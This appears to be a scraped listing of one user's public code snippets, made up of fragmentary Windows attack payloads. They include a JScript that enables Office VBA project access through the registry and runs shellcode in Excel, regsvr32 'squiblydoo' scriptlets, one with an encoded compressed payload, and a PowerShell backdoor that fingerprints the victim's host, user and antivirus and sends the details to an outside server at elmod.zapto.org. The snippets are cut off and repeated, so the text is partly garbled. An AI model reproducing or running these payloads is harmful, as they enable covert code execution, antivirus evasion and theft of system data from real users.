Elm0D / RemoteDLLGuest.cs
Created April 27, 2017 01:17
Remote DLLGuest
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Create Your Strong Name Key -> key.snk
$key = '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'
Elm0D / example.js
Created April 27, 2017 01:18
Shellcode via Office via .JS
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
// Sample Shell Code Execution Documented Here: https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/
var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n';
$EncodedCompressedFile = @';;
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
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
Elm0D / empire.sct
Last active October 13, 2022 00:48
empire.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
$spl = '\';$vn = 'Guest';function info { try {$mch = [environment]::Machinename;$usr = [environment]::username;$HWD = (Get-WmiObject Win32_LogicalDisk).VolumeSerialNumber;$HWD = $HWD[0];$wi = (Get-WmiObject Win32_OperatingSystem).Caption;$wi = $wi + (Get-WmiObject Win32_OperatingSystem).OSArchitecture;$wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');$av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;$e = $env:windir + '\Microsoft.NET\Framework\v2.0.50727\vbc.exe';if (test-path $e) {$nt = 'YES'} else {$nt= 'NO'}; if (test-path 'HKCU:\vdw0rm') {$usb = 'TRUE'} else { $usb = 'FALSE'};$u = $vn + '_' + $HWD + $spl + $mch + $spl + $usr + $spl + $wi + $spl + $av + $spl + $spl + $nt + $spl + $usb + $spl;return $u} catch {Start-Sleep -s 3}};function post ($cmdv, $v) { try { $enc = [system.Text.Encoding]::UTF8;$Req = [System.Net.HttpWebRequest]::Create('http://elmod.zapto.org:1199/' + $cmdv);$Req.Method = 'POST';$req.UserAgent = info;[System.IO.Stream]$stm;$stm = $Req
Elm0D / Backdoor-Minimalist.sct
Created April 29, 2017 23:22
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo". Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
$EncodedCompressedFile = @'
7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivvipP+nX+LV/jV/j1/h16P//9//9a/waf9evIc/vqT83PX8Q/f83+V3+nt/k1/jbfuyf/13/rl/z+T//u76ZF026qquLOluk02y5rNp0kqf1epkWy/Tpl6/TRTXLx7/xb5z8bgrj5emv8Ws8/zV/7V/jt/9f/53f28D9j36NX+vX/A1/zd/w1/g1fiv64zeTz/6CPfon/TUUsd9Tfv+1BG885uev8QfJ53/ob/hr0o/f8w9nAAzD/LQ/+HlKcL+LX35PAvkbeV/8Qvr/b0r//wN+jV8DH/9Gu7/Gr/E7eV/f+KS/xq/xG3h//gb097e9v8dt/q6ln3/ZbyFteay/ltdAPv4DxnVTT38Nxe33pP//JvT/3yZsRx//nuM6L6up4AqcGZYhsmv3JPyEyLUnP7/9a+CVX/fX+Ic+ovmgPn7NX4P//+v9Bh85nrjN8zvu/Dq/xn/9a/C7v/mv8WvU9GPV/Ga/xq+RJL9eRX8nv8av8R/8ukTZ/+DX+DW2aODJb/i7/BZ//G9LjX+j3+C3qR9S07/kN/htt35L+vwv+Q1+O/3529ff589/B/37d6z/Uf77d9K/f+f6d/818fcv0L9/lx8zvyT1lL/5XX7DX78i4ia/8W/xa2/91vLVb2Ta/Mb1L5E2v8mvX/028tFvar77zeo/W777zX/9inBMqt+OP9/67elH/ffTV7/N7/J7bv0O9Mcv/BbG+5th9L/mr/Hb/La/xq9Lg/41v/Vrbf0CHu+v8a1f47fc+bV+jce/Bk/Jb/5r/FL69tf5rf6vX/O3+b9o1Nsf/Rr1f0ig/iUSwV9r63dBLyn90/yuTLE/CE3lhd/wk1/j1//Wb7nza/4aJBWQV4ID
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /i"C:\Bypass\STC_MsgBox.sct" scrobj.dll -->
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>